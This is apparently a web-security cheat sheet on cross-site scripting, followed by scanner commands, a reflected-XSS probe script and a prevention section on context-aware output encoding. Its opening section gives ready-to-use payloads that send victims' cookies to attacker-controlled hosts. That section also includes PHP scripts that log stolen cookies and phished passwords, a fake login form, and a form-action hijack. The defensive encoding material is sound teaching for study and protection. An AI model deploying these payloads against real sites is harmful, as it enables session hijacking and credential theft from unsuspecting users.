  1. XSS Examples
    1. Simple Alert Box
    2. Cookie Stealing
      1. example one
      2. example two
      3. other examples
    3. Phishing
      1. example one
      2. example two
    4. Stored XSS -> Image onmouseover
    5. Call a script from an external source
    6. Post data to form
    7. DOM Deface
  2. Tools for scanning for XSS vulnerabilities
    1. ARACHNI: https://www.arachni-scanner.com/
    2. NMAP: (NSE scripts: http-dombased-xss , http-stored-xss , http-phpself-xss)
    3. XSSER
  3. Securing your code / preventing XSS
  4. Resources / More
    1. Links
      1. Cheatsheets and more
      2. Tools
      3. wordlists

XSS Examples

Simple Alert Box

<script>alert('attacked')</script>

Cookie Stealing

example one

<script>document.location="http://localhost/cookie.php?q="+document.cookie;</script>

This variant is noisy: it navigates the victim's browser to the attacker's cookie.php. The Image() variants further down exfiltrate the cookie without leaving the page.

example two

<a href="javascript:document.location='http://localhost/cookie.php?q='+document.cookie;">CLICK ME!</a>

cookie.php could look like this:

<?php
// Appends whatever arrives in ?q= (the victim's document.cookie) to cookie.txt
$file = "cookie.txt";
$act = fopen($file, 'a');
$cookie = $_GET['q'];
fwrite($act, $cookie . PHP_EOL);
fclose($act);
?>

other examples

<script>new Image().src="http://<attacker's IP Address>/b.php?"+document.cookie;</script>
<script>new Image().src="http://111.11.11.11/"+encodeURI(document.cookie)</script>
<script>$.post("http://111.11.11.11", {cookie:document.cookie})</script>

The Image() variants work on any page and do not need a readable response; the $.post() variant only works if the target page already loads jQuery. None of them can read cookies set with the HttpOnly flag, which document.cookie does not expose.

Phishing

example one

<form name="phish" action="http://localhost/phish.php" method="post">
<br><br><hr>
<h3>Login now:</h3><br><br>
Enter Username: <br><input type="text" name="email"><br>Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="Login" value="Login">
</form>
<br><br><hr>

phish.php could look like this:

<?php
// Appends the submitted credentials to phished.txt, then sends the victim on
// to a legitimate-looking page so that nothing seems wrong
$file = fopen('phished.txt', 'a');
fwrite($file, 'Email = ' . $_POST['email'] . PHP_EOL);
fwrite($file, 'Pass = ' . $_POST['pass'] . PHP_EOL . PHP_EOL);
fclose($file);
header("Location: http://example.com/xss.html");
die();
?>

example two

In this case the page looks completely unchanged to the victim: the injected script rewrites the action of the site's own login form, so the credentials typed into the legitimate form are posted to the attacker's server. TLS does not help, because the page is served legitimately and only modified afterwards inside the victim's browser.

document.forms[0].action="http://hackersite.com/phish.cgi";

Stored XSS -> Image onmouseover

<IMG SRC=# onmouseover="alert(document.cookie)">

Call a script from an external source

<script>document.write('<script src=http://example.com/xss.js><\/script>')</script>

The inner closing tag has to be written as <\/script>: a literal </script> inside the string would end the outer script block early in the HTML parser, before the JavaScript ever runs.

Post data to form

<script>$.post("<form handler URL>", {parameter: "<value>"})</script>

The request is sent with the victim's cookies, so it acts as the victim; because the script runs in the page, it can also read any anti-CSRF token from the DOM and include it. Like the $.post() cookie example, this needs jQuery loaded on the target page.

DOM Deface

// deface with an image
document.body.innerHTML='<img src="#" height="500%" width="700%">';

Tools for scanning for XSS vulnerabilities

ARACHNI: https://www.arachni-scanner.com/

NMAP: (NSE scripts: http-dombased-xss , http-stored-xss , http-phpself-xss)

nmap -p80 --script http-stored-xss --script-args httpspider.maxpagecount=200 <target-host>

XSSER

xsser -c 100 --Cw=4 -u "http://<target-host>/"
-c : number of pages to crawl
--Cw : depth of the crawler (1-5)
-u : target URL

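The scanners above all do the same basic thing for reflected XSS: send a unique marker containing the characters a payload needs and check whether the response echoes them unencoded. The following is an added example of that probe in Node.js (Node 18+ for the built-in fetch()), not code from the original page or from any of the tools listed; the target URL and the search parameter name are assumed placeholders, and the sample responses are constructed so the classification can be tried offline.

```javascript
// Added example: a minimal reflected-XSS probe of the kind Arachni, the nmap
// http-*-xss scripts and XSSer automate. Target URL and parameter are assumed.

const CANARY_CHARS = ['<', '>', '"', "'"];

// A canary is an unlikely tag, the special characters, then the tag again, so
// the reflected region can be located even if the page transforms the middle.
function makeCanary(tag) {
  return { tag, value: tag + CANARY_CHARS.join('') + tag };
}

// Put the canary in the chosen query parameter; URL does the percent-encoding.
function buildProbeUrl(baseUrl, param, canary) {
  const u = new URL(baseUrl);
  u.searchParams.set(param, canary.value);
  return u.toString();
}

// Which special characters came back raw between the two tag markers?
//   null  -> the parameter is not reflected at all
//   []    -> reflected, but every special character was encoded, stripped or cut
//   [...] -> these characters survived: the parameter is injectable in some context
function unencodedChars(body, canary) {
  const start = body.indexOf(canary.tag);
  if (start < 0) return null;
  const rest = body.slice(start + canary.tag.length);
  const end = rest.indexOf(canary.tag);
  if (end < 0) return [];
  const between = rest.slice(0, end);
  return CANARY_CHARS.filter((ch) => between.includes(ch));
}

// Constructed sample responses for one fixed canary (no server involved):
const DEMO = makeCanary('xsscanary7f3a');
const SAMPLES = {
  // echoed straight into the page: fully injectable
  raw: `<p>No results for ${DEMO.value}</p>`,
  // htmlspecialchars($v, ENT_QUOTES)-style output: nothing survives
  encoded: `<p>No results for ${DEMO.tag}&lt;&gt;&quot;&#039;${DEMO.tag}</p>`,
  // < > " encoded but the single quote left alone (htmlspecialchars() without
  // ENT_QUOTES on PHP < 8.1): still exploitable inside a single-quoted attribute
  partial: `<input value='${DEMO.tag}&lt;&gt;&quot;'${DEMO.tag}'>`,
  // the parameter is not reflected
  none: '<p>No results</p>',
};

// Live probe, optional: node probe.js "http://<target-host>/search.php" q
async function probe(baseUrl, param) {
  const canary = makeCanary('xsscanary' + Math.random().toString(36).slice(2, 8));
  const res = await fetch(buildProbeUrl(baseUrl, param, canary));
  return unencodedChars(await res.text(), canary);
}

if (process.argv[2]) {
  probe(process.argv[2], process.argv[3] || 'q').then((r) => console.log(r));
}
```

A raw result of all four characters means the value lands in HTML body context; a result of only a quote character usually means an attribute injection. A real scanner then picks a payload for that context, which is exactly what the per-context encoders in the prevention section below are meant to defeat.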
Securing your code / preventing XSS

XSS is prevented by encoding untrusted data for the context it is written into (HTML body, HTML attribute, JavaScript string, URL), not by "cleaning" the input. Some common encoding functions:

  • asp.net (Microsoft AntiXSS library): AntiXss.HtmlEncode() for data placed in HTML, AntiXss.JavaScriptEncode() for data placed inside script
  • php: htmlspecialchars($value, ENT_QUOTES, 'UTF-8') for HTML contexts (htmlentities() with the same flags also works)

trim(), stripslashes() and mysql_real_escape_string() are often listed as XSS defences but are not: the first two only strip whitespace and backslashes, and mysql_real_escape_string() escapes for SQL string literals (and was removed in PHP 7.0). Encoding alone does not stop a user-supplied link such as javascript:..., which contains no special characters; the URL scheme has to be allow-listed. Complement encoding with a Content-Security-Policy that disallows inline script and with the HttpOnly flag on session cookies, which keeps document.cookie from exposing the session to the payloads above.

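The following is an added example, not code from the original page, of context-aware output encoding in JavaScript doing what htmlspecialchars() and AntiXss.HtmlEncode() do on the server. It runs the page's own payloads through a deliberately vulnerable renderer and through hardened ones for the HTML, JavaScript-string and URL contexts; the render* functions are hypothetical templates written for this example.

```javascript
// Added example: per-context output encoding, exercised with the payloads
// from the XSS Examples section above. render* functions are hypothetical.

// HTML body and quoted-attribute context: the five characters that can change
// the markup are replaced with entities.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// JavaScript string-literal context (a value dropped into <script>var q="...";):
// \uXXXX-escape everything but alphanumerics, so neither a quote nor </script>
// survives to break out of the literal or of the script block.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL context: encoding cannot help here, because javascript:... contains no
// special characters. The scheme has to be allow-listed instead. Absolute URLs
// only; relative links would need resolving against the site's base URL first.
function safeHref(value) {
  let url;
  try { url = new URL(String(value)); } catch { return '#'; }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : '#';
}

// Vulnerable: untrusted data concatenated into markup, which is what every
// payload on this page relies on.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened: each value is encoded for the context it lands in.
function renderComment(comment) {
  return `<div class="comment">${encodeHtml(comment)}</div>`;
}
function renderLink(href, text) {
  return `<a href="${encodeHtml(safeHref(href))}">${encodeHtml(text)}</a>`;
}
function renderInlineScript(value) {
  return `<script>var q="${encodeJsString(value)}";</script>`;
}

// Payloads taken from the examples above, plus a script-block breakout.
const PAYLOADS = {
  alertBox: "<script>alert('attacked')</script>",
  imgHandler: '<IMG SRC=# onmouseover="alert(document.cookie)">',
  jsUrl: "javascript:document.location='http://localhost/cookie.php?q='+document.cookie;",
  scriptBreakout: '</script><script>alert(1)</script>',
};

// Count real <script ...> tags in rendered output; encoded text has no '<'.
function scriptTagCount(html) {
  return (html.match(/<script[\s>]/gi) || []).length;
}
```

Two checks are worth keeping as unit tests in a real code base: encodeJsString() must round-trip (JSON.parse('"' + encoded + '"') returns the original, since JSON accepts \uXXXX escapes), and the inline-script template must contain exactly one script tag no matter what the value is.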
Resources / More

Cheatsheets and more

XSS Filter Evasion Cheat Sheet from OWASP
xss payloads cheatsheet
collection of xss payloads, tools and reference
bypassing XSS filtering by s0md3v

Tools

XSS Fuzzer
xcampo

wordlists

a payloads.txt
another payloads.txt